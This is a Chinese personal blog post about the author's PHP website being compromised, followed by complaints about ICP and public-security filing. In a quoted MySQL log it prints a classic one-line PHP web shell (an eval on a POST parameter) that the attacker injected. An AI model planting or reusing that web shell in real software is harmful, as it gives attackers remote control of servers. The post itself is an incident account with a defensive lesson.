一些计算机零碎知识随写(25年1月)-1

我原以为世界上有技术的那批人不会那么闲,我错了,被脚本真实了。

今天正隔着画画呢,手机突然弹出几条安全告警通知。

急忙打开服务器,发现问题不简单,直接关服务器重装系统.....

首先,不要认为小网站,没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜欢攻击的黑客(在这个时代也不是没有可能是恶意的流窜ai),不要向我一样,认为这个网站没什么人看,什么保护也不加,等到被爆破了才急忙修改,要是生产环境被这么搞一下那就很坏了。(各种意义上的)

因为我是php写的网站,php的漏洞很多是历史遗留问题了,没有很好的代码规范的话那很容易被入侵。

就比如我没有加入文件验证之类的(我当时的想法:不会有人这么闲吧)。

我的思考

php这个语言漏洞太多,对于我来说要么以后补课网络安全php这方面的课程,要么趁早换一门语言。

那名坏笔到底在我服务器干了什么呢?

事情已经发生了,气急败坏不如冷静分析。

首先是恶意上传一个php文件,然后查询了我所有的数据库文件

具体的代码如下

php 复制代码
C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		   60 Query	select'<?php eval($_POST[admin]);?>'
		   60 Quit

那很坏了

eval 函数在这种情况下如果被成功执行,明显是具有恶意企图的,可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。

第二个是一个木马病毒

太坏了

根据计算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件,造成系统崩溃或无法正常启动。

它可以监控用户的计算机操作,并窃取敏感信息,如银行账户密码、个人隐私等。

所以说病毒什么乱七八糟并不是少了,而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器当作代理(?不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。

然后正上厕所呢,公安给我打电话来了。

公安备案失败

之前icp备案根据腾讯云的提示操作起来没有过于麻烦,就是写写表(个人是这样,企业的话多一些步骤。)

然后icp过完审核居然还要公安部审核,就不能一起审核吗,真是徒增开发者的麻烦呢。

个人的网站icp备案和公安的表几乎没有什么差别,所以真的很难理解呢!

然后就打电话告诉我说不受理,去自己的户籍地办理去(icp是常驻地)

emm...???

感叹一些地方上的办事效率差,效率低了。

所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗?

不啊我的朋友,个人博客要就不申请域名要不就一步到位买国外的好啦!就不用这么多麻烦的手续啦!

相关推荐
CYRUS_STUDIO1 小时前
使用 Dex2C 加壳保护 Android APK 代码
android·安全·逆向
一颗星星辰1 小时前
路由交换网络专题 | 第八章 | GVRP配置 | 端口安全 | 端口隔离 | Mux-VLAN | Hybrid
网络·安全
自由鬼1 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
mon_star°4 小时前
搭建基于火灾风险预测与防范的消防安全科普小程序
安全·微信小程序·小程序·微信公众平台
神经毒素5 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
程序猿chen8 小时前
量子跃迁:Vue组件安全工程的基因重组与生态免疫(完全体终局篇)
前端·vue.js·git·安全·面试·前端框架·跳槽
ALe要立志成为web糕手8 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
w23617346019 小时前
Apache中间件解析漏洞与安全加固
安全·中间件·apache
PawaAdapter9 小时前
IBC-基于身份标识的密码系统和签名方案
安全
CHTXRT10 小时前
2025第十六届蓝桥杯大赛(软件赛)网络安全赛 Writeup
c语言·网络·web安全·网络安全·蓝桥杯·wireshark